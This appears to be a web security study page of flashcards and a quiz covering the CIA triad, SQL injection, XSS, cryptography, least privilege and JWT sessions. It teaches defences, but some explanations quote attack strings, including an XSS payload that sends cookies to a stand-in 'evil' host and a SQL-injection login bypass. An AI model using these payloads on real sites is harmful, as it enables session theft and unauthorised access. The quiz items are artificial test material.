HttpOnly is valuable but not sufficient. Defense in depth: prevent XSS in the first place (output encoding), add a strict CSP, set SameSite=Strict on session cookies, and require fresh authentication for sensitive actions (transfer money, change password).
Difficulty:Basic
State the Zero Trust security principle in one sentence and give one operational consequence.
Zero Trust says users and devices should not be trusted by default — every request must be authenticated and authorized regardless of where it originates, and every input must be validated and sanitized regardless of its source. Operational consequence: draw the trust boundary tightly. Inputs from end users, third-party APIs, file uploads, configuration files, and even other internal services must be validated at the boundary they cross into your code.
Zero Trust replaced the older ‘castle and moat’ / perimeter model, which assumed that anything inside the corporate network was trustworthy. That assumption fails against insider threats, compromised internal hosts, and supply-chain attacks.
Difficulty:Intermediate
What is security through obscurity, and why is it a bad foundation?
Security through obscurity is the practice of relying on hiding the design or mechanism of a system to keep it secure (a hidden URL, a custom-rolled hash, an unpublished port). It is a bad foundation because as soon as anyone reverses or discovers the design, the entire defense collapses — the lecture’s analogy is hiding the house key in a flowerpot. Real security must rest on something that stays secret even when the design is public — typically a key — which is what the Open Design principle requires.
Obscurity is not useless; it is just not a foundation. Hiding your specific framework versions and config (complementary obscurity) is reasonable defense-in-depth on top of strong open mechanisms — never instead of them.
Difficulty:Advanced
When should you apply public scrutiny vs. complementary obscurity?
Public scrutiny when proposing a new security approach or algorithm — expose the design to the security community so weaknesses are found before attackers exploit them. Complementary obscurity when deploying an existing, well-scrutinized technology in a real product — hide implementation specifics (framework versions, configuration, internal endpoints) to slow down opportunistic attackers who look for known vulnerabilities. The two apply to different layers and are not contradictory.
AES, RSA, and TLS are all openly published — they had to be, to earn trust. But you should not advertise that your production server runs Apache 2.4.49 with a particular CVE outstanding.
Difficulty:Intermediate
State the Principle of Least Privilege and give one concrete application.
Principle of Least Privilege: every program and every privileged user of the system should operate using the least set of privileges necessary to complete its job. Concrete application: split a monolithic app into small components, each with narrowly scoped permissions — the email-notification service holds only the email-API credential, the image-upload service holds only write access to the upload bucket. If one component is compromised, the blast radius is limited to what that component’s credentials can do.
Originally formulated by Saltzer and Schroeder (1975). Cloud IAM systems (AWS IAM, GCP IAM, Kubernetes RBAC) are designed around it. Running every service as the database owner with full network egress is one of the most common findings in real security audits — and one of the most damaging when exploited.
Difficulty:Basic
What four questions does a security plan answer?
(1) Security model — what are you defending? (assets: data, services, secrets, reputation). (2) Threat model — who might be attacking, and what are they trying to achieve? (3) Attack surface — which parts of the system are exposed to an attacker? (4) Protection mechanisms — how do we prevent (or detect) compromise?
Walk these four for any system you build or inherit. A defense built without a matching threat model fails — the foil-cover-on-an-emergency-phone is the canonical example.
Difficulty:Intermediate
What four dimensions does a useful threat model describe?
(1) Knowledge — what does the attacker already know? (Public docs only? Stolen source code? Insider with credentials?) (2) Actions — what can they actually do? (Send web requests? Run code on a guest VM? Tap the network?) (3) Resources — how much time, money, and infrastructure can they spend? (Bored teenager? Criminal cartel? Nation-state?) (4) Incentive — why do they want to compromise the system? (Financial gain? Espionage? Vandalism?)
Different threat models warrant different defenses. A consumer mobile app and a defense contractor’s collaboration tool may use the same primitives (TLS, auth, encryption at rest) but the strength and layering differ by orders of magnitude.
Difficulty:Advanced
What is the attack surface of a system, and why does shrinking it matter?
The attack surface is the set of inputs, endpoints, ports, and side channels through which an attacker could plausibly interact with the system — every public API, every form field, every file path, every network port, every dependency. Shrinking it matters because every exposed surface is a place a vulnerability could live. The fewer surfaces, the fewer things to defend, the fewer things to test, and the smaller the chance of an unmonitored entry point.
Standard moves to shrink attack surface: turn off unused features, close unused ports, drop unused dependencies, restrict admin interfaces to a private network, expose only the smallest public API needed. The Principle of Least Privilege shrinks the blast radius once an attacker is in; shrinking the attack surface tries to keep them out in the first place.
Difficulty:Intermediate
Why are session cookies still vulnerable to XSS even when HttpOnly is set?
Because XSS gives the attacker code execution inside the trusted page’s origin. Even though the script cannot read the cookie (thanks to HttpOnly), it can still issue authenticated fetch requests through the browser — the browser will attach the cookie automatically. So the attacker rides the session in the victim’s browser without ever touching the raw token. This is sometimes called session-riding.
The right framing: HttpOnly prevents theft of the session ID, not use of the session. Defense in depth — strict CSP, output encoding, SameSite=Strict — is what prevents XSS from being weaponized in the first place.
Difficulty:Advanced
Distinguish authenticity from the three CIA properties. Why isn’t it part of the triad?
Authenticity is the property that a message can be reliably attributed to a particular sender — typically achieved with a digital signature or a message-authentication code. It is closely related to integrity (both detect tampering) but adds the who. The classical CIA triad omits it because authenticity and the related properties of non-repudiation and accountability were historically treated as distinct goals. Modern variants (CIANA, the Parkerian hexad) often add Authenticity (and sometimes Possession, Utility) explicitly — useful, but not what the standard CIA triad refers to.
On a quiz that asks about ‘the CIA triad’, stick with C/I/A. If the question is about general security goals, naming Authenticity / Non-repudiation alongside is reasonable and shows depth.
Workout Complete!
Your Score: 0/28
Come back later to improve your recall!
Security and Authentication Quiz
Test your ability to reason about the CIA triad, web vulnerabilities, cryptographic primitives, authentication, and security design principles in realistic scenarios — not just recite definitions.
Difficulty:Basic
Which of the following is not one of the three security attributes in the CIA triad?
Confidentiality is one of the three. The triad is Confidentiality, Integrity, Availability.
Integrity is one of the three. The triad is Confidentiality, Integrity, Availability.
Availability is one of the three. The triad is Confidentiality, Integrity, Availability.
Correct Answer:
Explanation
The CIA triad is Confidentiality, Integrity, Availability — the three classical attributes of information security. Authenticity (and the related properties of non-repudiation and accountability) is a real and important security goal, but it is not part of the CIA triad. Some textbooks add Authenticity as part of an extended CIANA or Parkerian hexad model — useful, but not what the standard triad refers to.
Difficulty:Basic
A ransomware attack encrypts the only copy of a hospital’s patient records. Doctors cannot read them, and the on-disk bytes have been replaced with attacker-controlled ciphertext. Which CIA properties has the attack violated? (Select all that apply.)
Confidentiality means unauthorized reads — attackers gaining access to data they shouldn’t see.
A pure ransomware attack typically does not exfiltrate the data; it just makes it unreadable to the
rightful owner. (Modern “double-extortion” ransomware also exfiltrates, which would add a
confidentiality violation — but the encryption-in-place attack on its own does not.)
Correct — overwriting the on-disk bytes with attacker-controlled ciphertext changes the data without
authorization, which is exactly what an integrity violation is.
Correct — the data is no longer accessible to the legitimate users who need it (doctors, the
hospital), which is exactly what an availability violation is.
Correct Answers:
Explanation
Encrypting the data in place violates Integrity (the bytes have been changed by an unauthorized party) and Availability (the legitimate users can no longer reach their data). A pure ransomware attack typically does not violate confidentiality, because the attackers don’t need to read the data — they just need to make it unreadable to its owner. Modern ‘double-extortion’ ransomware exfiltrates and encrypts, which would add a confidentiality violation; classical ransomware does not.
Difficulty:Basic
Attackers exploit an unpatched server vulnerability and download the personal records of 147 million users — names, dates of birth, Social Security numbers. None of the data on the company’s servers is altered or deleted. Which CIA property is primarily violated?
Integrity would mean the data was modified without authorization. Here the records on the company’s
servers were not changed — they were just read by the wrong party.
Availability would mean legitimate users could no longer reach the data. The company’s services kept
running normally; the breach was that strangers obtained a copy of the data.
Correct Answer:
Explanation
Confidentiality is the violation here. Sensitive data was disclosed to people who had no business reading it. Integrity would mean the data on the company’s servers was changed; Availability would mean it was inaccessible to the company. This is the textbook shape of a data exfiltration breach (the Equifax 2017 incident is the canonical example) — pure confidentiality, with no on-server damage.
where <typed username> and <typed password> are concatenated into the SQL string. What is the most direct vulnerability in this code?
Cross-site scripting is about user-supplied content being rendered as code in a browser. This bug
is about user-supplied content being executed as code by a database.
Slow queries are a performance concern, not the vulnerability the code is exposing. The injection
bug is present even if the query is fast.
Phishing is a social-engineering attack on the user to obtain credentials. This bug lets an
attacker bypass the password check directly, without needing to phish anyone.
Correct Answer:
Explanation
Building a SQL query by string-concatenating user input creates a SQL injection vulnerability: a payload like " or ""=" makes the password predicate trivially true, logging the attacker in without knowing the password. The fix is to use parameterized queries / prepared statements, where the SQL is parsed once with placeholders and the user input is bound separately as values.
Difficulty:Intermediate
A developer fixes the SQL injection bug from the previous question by switching to a parameterized query:
SELECT*FROMUsersWHEREName=@0ANDPass=@1
with name and pass passed as separate arguments to the database driver. What is the primary reason this prevents SQL injection?
Some drivers do escape quotes in some modes, but escaping is fragile and bypassable across encodings.
The strong guarantee comes from separation, not substitution: the SQL is parsed before the values
are even attached.
Encryption in transit is a separate concern (TLS) and does not prevent injection. An attacker who
controls the input string is already inside the trust boundary of the application, regardless of
whether the wire is encrypted.
Keyword blocklists are a classic anti-pattern — they are easy to evade with obfuscation, comments,
case games, and Unicode tricks. The actual mechanism is structural: the values arrive after parsing
and cannot influence the query’s structure.
Correct Answer:
Explanation
Parameterized queries protect against SQL injection through structural separation: the database receives the SQL with placeholders, parses it into a query plan, and only then binds the parameter values into that plan. The values never traverse the SQL parser, so they cannot grow new SQL syntax (extra clauses, comments, sub-queries). Escaping and blocklisting are weaker, error-prone alternatives; parameterization is the only fix that is robust to all the corner cases.
Difficulty:Intermediate
A social-media site lets users post comments and renders each comment by interpolating the comment text directly into the HTML page. Another user later views the post in their browser. Which CIA properties can a successful XSS payload violate in this scenario? (Select all that apply.)
Don’t omit this one — reading cookies and session tokens is the most common goal of XSS attacks.
Once exfiltrated, the attacker can impersonate the victim against the trusted site.
Don’t omit this one — XSS routinely mutates the DOM, defaces pages, or fires off authenticated
requests as the victim (changing settings, posting comments, transferring funds in vulnerable apps).
Correct Answers:
Explanation
XSS primarily violates Confidentiality (cookies and tokens read and exfiltrated) and Integrity (the page is mutated and authenticated requests are issued in the victim’s name). Availability violations are possible — a runaway script can wedge the victim’s browser — but they are the least common goal of XSS in practice. The shared root cause with SQLi is user-supplied data being treated as code by some downstream interpreter (the database for SQLi, the browser for XSS); the fix in both cases is to keep code and data separate.
Difficulty:Intermediate
Your team is shipping a comments feature on a blog. Which defense most directly prevents XSS attacks via the comment field?
Length limits don’t help — <script>fetch('//evil/?c='+document.cookie)</script> already fits in
well under 280 characters, and so do most worm payloads. The vulnerability is about content, not
size.
Keyword blocklists are a classic anti-pattern. An attacker can use <img src=x onerror=...>,
<svg onload=...>, or other tags that don’t contain the word “script” at all. Filtering by string
match always loses to a clever attacker.
Storing the comment in a different table affects how data is laid out at rest, but it doesn’t
change how the comment is rendered. The XSS happens at render time, in the victim’s browser, when
the attacker-supplied HTML is interpolated into the page.
Correct Answer:
Explanation
The primary fix for XSS is output encoding: when user-supplied content is rendered into HTML, escape the metacharacters so the browser interprets them as text, not as tag boundaries. Modern templating engines (React JSX, Vue {{ }}, Django, Jinja2) escape by default — XSS bugs typically appear when developers explicitly bypass the escaping (dangerouslySetInnerHTML, mark_safe, |safe, v-html). Layered defenses (a strict Content Security Policy, HttpOnly cookies for session tokens) help in depth, but escaping at the rendering boundary is the foundation.
Difficulty:Advanced
A startup announces a new “proprietary, never-before-published” encryption algorithm that they claim is unbreakable because “nobody knows how it works”. What is the most fundamental problem with this approach to security?
Performance is a legitimate but secondary concern. The deeper problem is that the security
depends on the design staying hidden — and designs do not stay hidden.
Patent considerations are a business question. The security question is whether the design will
survive contact with attackers, and a hidden algorithm has not been tested.
Some encryption algorithms are subject to export restrictions, but most are not — and that is not
what makes obscurity-based security a bad foundation. The issue is that the design will be
reverse-engineered, and then the algorithm has nothing left.
Correct Answer:
Explanation
This is the classic Security through Obscurity anti-pattern. Open Design says the security of a system must rest on something that stays secret even when the design is public — typically a key. AES, RSA, and TLS are all openly published; their security depends on the secrecy of keys, not algorithms. Public scrutiny is not a bug — it is the mechanism by which weaknesses are discovered and patched. A ‘secret algorithm’ has had none of that scrutiny and will fall to the first determined attacker who reverses it.
Difficulty:Advanced
Two scenarios. (1) A research team has just designed a new public-key signature scheme and wants to know whether it is secure. (2) A company is about to deploy a production system using a well-studied existing TLS library. Which is the right disclosure stance for each?
Hiding everything is the obscurity-only stance and is exactly the failure mode the Open Design
principle exists to prevent. New algorithms in particular need scrutiny to find weaknesses before
attackers do.
Publishing the design of a new algorithm is right. Publishing the exact running version and
configuration of a production deployment hands attackers a free reconnaissance map — known
vulnerabilities in specific framework versions become trivial to weaponize.
This inverts both rules. A new algorithm without scrutiny is fragile; publishing exact production
config invites attackers to map known CVEs onto your deployment.
Correct Answer:
Explanation
Public scrutiny for new security designs (so weaknesses are found by the community before they ship to attackers) and complementary obscurity for deployed systems (hide your specific framework versions and config, so opportunistic exploits don’t get a free aim) are not contradictory — they apply to different layers. The foundation (the algorithm, the protocol) must be open. The deployment specifics (versions, ports, paths) can reasonably stay hidden as a defense-in-depth layer on top of an already-strong foundation.
Difficulty:Basic
Alice wants to send a private message to Bob that only Bob can read, using public-key cryptography. Whose key, and which one, should Alice use to encrypt the message?
Encrypting with Alice’s private key is what a digital signature does — anyone with Alice’s
public key can decrypt it, so it is not a secret. It proves Alice wrote the message but does not
keep its contents private.
If Alice encrypts with her own public key, only her own private key can decrypt. Bob would not
be able to read it.
Alice does not have Bob’s private key (and should not — that is the whole point of “private”).
Encrypting to Bob is done with his public key.
Correct Answer:
Explanation
To send a message that only Bob can read, encrypt with Bob’s public key. Anyone may have that key, so Alice can use it without prior secret sharing — but only Bob’s matching private key (which only Bob holds) can decrypt the resulting ciphertext. This is what makes public-key cryptography solve the key-distribution problem that symmetric encryption suffers from: no shared secret needs to be established before private communication can begin.
Difficulty:Intermediate
In practice, a digital signature scheme hashes the document first and then encrypts the hash with the signer’s private key — rather than encrypting the entire document. Why?
Hashes are not encryption — they are one-way fingerprints. They provide integrity (any change to
the document changes the hash), not confidentiality.
Encrypting the document with the private key would let anyone with the public key decrypt and
read it — so the document would still be readable. The reason for hashing is performance, not
readability. (And digital signatures don’t aim for confidentiality in the first place.)
Cryptographic hashes are not reversible — that is exactly why they are usable as fingerprints.
Reversibility would defeat the integrity guarantee.
Correct Answer:
Explanation
Public-key operations (RSA in particular) are roughly three orders of magnitude slower per byte than a fast hash like SHA-256. Hashing first reduces any document to a 32-byte digest, so the expensive public-key operation runs over those 32 bytes regardless of the document’s original size. The hash’s collision-resistance is what keeps the signature meaningful — an attacker cannot construct a different document that produces the same hash and therefore the same signature. Signatures provide integrity and authenticity, not confidentiality.
Difficulty:Intermediate
A junior engineer proposes that the client send the username and password on every request, and the server verifies them every time. Which problems does this design have? (Select all that apply.)
Don’t omit this one — slow password hashing on every request is a real performance problem. The
whole point of session IDs and JWTs is to amortize the password check.
Don’t omit this one — keeping the cleartext password live in memory and sending it on every
request multiplies the chances of it being exposed.
Query length is irrelevant. The problems are performance and security exposure, not SQL aesthetics.
Putting passwords in URL query strings is a well-known anti-pattern — URLs are logged on servers,
proxies, browser history, and referer headers. This option is the opposite of helpful.
Correct Answers:
Explanation
Sending the password on every request is slow (passwords are deliberately hashed with a slow algorithm — bcrypt, Argon2 — that is fine to run on login but expensive to repeat on every API call) and insecure (the cleartext credential lives in memory and on the wire for the whole session, with many opportunities to leak). The standard fix is to authenticate once, then issue a short-lived session token (a session ID or JWT) that rides on subsequent requests in the client’s place.
Difficulty:Advanced
A web app stores its session tokens in HttpOnly cookies and reads them only on the server. A teammate concludes: “That makes the app immune to XSS — the script can’t read the cookie, so we’re safe.”What is wrong with this conclusion?
XSS gives the attacker code execution inside the trusted page. Even without reading the cookie,
that code can do anything the legitimate page can do — including issuing authenticated requests
that the browser will attach the cookie to automatically.
HttpOnly is a long-standing, fully supported cookie attribute. The teammate’s mistake is
conceptual, not about browser support.
HttpOnly is supported by every major browser. The error is in confusing theft of the token
with use of the session.
Correct Answer:
Explanation
HttpOnly is a valuable defense — it prevents JavaScript from reading the session ID and exfiltrating it — but it does not prevent the script from using the session. A script running in the trusted origin can call fetch('/api/...', { credentials: 'include' }) and the browser will attach the cookie automatically. So the attacker rides the session in the victim’s browser without ever touching the raw token. This is sometimes called session-riding. Layered defenses — strict CSP, output encoding to prevent XSS in the first place, SameSite=Strict cookies — are needed; HttpOnly alone is not enough.
Difficulty:Advanced
Which of the following are accurate trade-offs of using a JSON Web Token (JWT) instead of a server-managed session cookie? (Select all that apply.)
Don’t omit — statelessness is the headline JWT advantage. No session store means no shared
coordination between backends.
Don’t omit — revocation is the headline JWT disadvantage. A stolen JWT is good until it expires;
you cannot just “log it out” of a database the way you can a session ID.
Don’t omit — localStorage is XSS-readable, which makes JWTs in localStorage worse than
HttpOnly cookies. The choice of where to store the JWT matters as much as the choice between
JWTs and session cookies.
Forgery resistance comes from the signing key held by the server. Anyone with the key can forge
a JWT; “no one can forge it” is wrong without that qualification.
TLS protects the transport — confidentiality of the request body, the URL, and the bearer token
itself in flight. A JWT signature does not cover any of that. Always use HTTPS regardless of
token format.
Correct Answers:
Explanation
JWTs trade a server-side session store for a signed, client-side token. The headline benefit is statelessness (no shared session store between backends — easier horizontal scaling). The headline costs are difficulty of revocation (no centralized ‘log out’ before exp) and the storage problem (localStorage is XSS-readable). Two things JWTs do not do: they don’t eliminate the need for HTTPS, and they don’t prevent forgery without key secrecy — anyone holding the signing key can mint a valid token.
Difficulty:Advanced
You are designing a small e-commerce backend with four components: a Product Display service, an Email Notification service, an Image Upload service, and a System Backup service. Following the Principle of Least Privilege, which permission set is most appropriate for the Email Notification service?
Full read/write to every table is the opposite of least privilege. If the notification service
is compromised, the attacker now owns the entire database. The notification service does not need
to write to any table to send an email.
Read-only-everywhere is better than read/write-everywhere, but still gives an attacker who
compromises the notification service a free dump of every table. The data the email needs should
be passed in (or fetched from a narrow read-only view), not retrieved by querying every table.
Root on the host is the worst possible answer — it is the upper bound of privilege, not the lower
bound. OS-level tuning of email queues should be done by an explicit admin process, not by the
running service.
Correct Answer:
Explanation
The Email Notification service has one job: send email. It needs only the credential for the email-sending API and no database access. If it is later compromised — through a vulnerable dependency, a misconfigured handler, an injected payload — the blast radius is limited to whatever harm that one credential can do (sending unwanted email), not to the whole database. The pattern generalizes: each component holds the narrowest set of permissions that lets it do its job. AWS IAM, GCP IAM, and Kubernetes RBAC are all designed around this model.
Difficulty:Advanced
An emergency telephone in a hospital lobby is meant to dial only 9-1-1. To enforce this, the buttons are covered with an aluminum foil shield with cutouts for the digits “9” and “1”. Which security plan element is most clearly broken in this design?
The system is defending something real (preventing misuse of the emergency line). The failure
is in who and how the attack might happen, not in whether defending it is worthwhile.
The technology of the lock is not the issue. A correctly-designed mechanical cover would still be
a valid defense — the design here just got the threat model wrong.
Smaller attack surfaces are better, not worse. Exposing more buttons would make the system more
vulnerable, not more secure.
Correct Answer:
Explanation
The defense assumes the attacker will only try to press one digit at a time, so cutouts for just ‘9’ and ‘1’ are enough. But the attacker can dial any number whose digits are drawn from {9, 1} — for example 911-1119 is a perfectly valid 7-digit US number that this cover allows. The mistake is in the threat model — the description of what an attacker might do — not in the strength of the defense itself. The same image also illustrates an attack-surface problem (the foil itself can be torn or pushed sideways), but the most fundamental error is the threat-model misjudgment.
Difficulty:Expert
A team is building a mobile banking app whose backend is a fleet of microservices. Authentication must work across many services without each service hitting a shared session store on every request, but compromised tokens must be revocable in well under an hour. Which authentication design is the best fit?
Re-sending the password on every request is the naive design — slow (password hash on every call)
and insecure (cleartext password kept in memory for the whole session).
A 1-year session has no practical revocation story; a stolen cookie is good for a year. TLS
protects the wire, not the session lifetime.
Hardcoded API keys in mobile binaries are a classic anti-pattern — every user of the app holds the
same key, the binary can be reverse-engineered, and “manual rotation” means re-shipping the app to
every user every time something leaks.
Correct Answer:
Explanation
The combination of short-lived JWT (so each microservice can validate locally without shared state) and server-tracked refresh token (so the server retains a ‘kill switch’) is the standard design for distributed auth at scale. JWT expiries are kept short (5–15 minutes is common) precisely so that revocation latency is bounded — even without a central revocation list, a token only stays usable until its exp. Refresh tokens are checked against a server-side store at renewal time, so revoking one stops further access within one expiry window.
Difficulty:Intermediate
A teammate says: “We don’t need TLS on our API because we use JWTs, and JWTs are signed — attackers can’t tamper with the requests.”What is wrong with this claim?
Signatures protect integrity (the receiver can detect tampering). They do not protect
confidentiality (an eavesdropper can still read the token).
Nothing in the JWT spec forbids HTTP transport. Browsers and HTTP clients send Authorization
headers over HTTP just fine — that is exactly what makes plain-HTTP JWT deployments dangerous.
TLS is required for any sensitive data — sessions, personal data, internal APIs — not just card
data. The “TLS is for payments only” view is a holdover from the early HTTPS era.
Correct Answer:
Explanation
TLS and JWT signatures protect different properties. TLS encrypts the entire connection (request lines, headers, bodies) and authenticates the server. JWT signatures protect the integrity of the token’s claims — they let the server detect that the token’s contents weren’t modified. Without TLS, an attacker on the network can read the JWT in flight and replay it from their own machine — the signature still verifies, because the attacker isn’t modifying anything. Always serve JWT-protected APIs over HTTPS.
Workout Complete!
Your Score: 0/18
Cookie & Privacy Notice:
This site stores a few preferences and your progress locally in your browser
(cookies and localStorage) so it works the way you left it.
Nothing is sent to or stored on any external server, and this site does not
sell, share, or disclose any user data to third parties.
View & manage your data →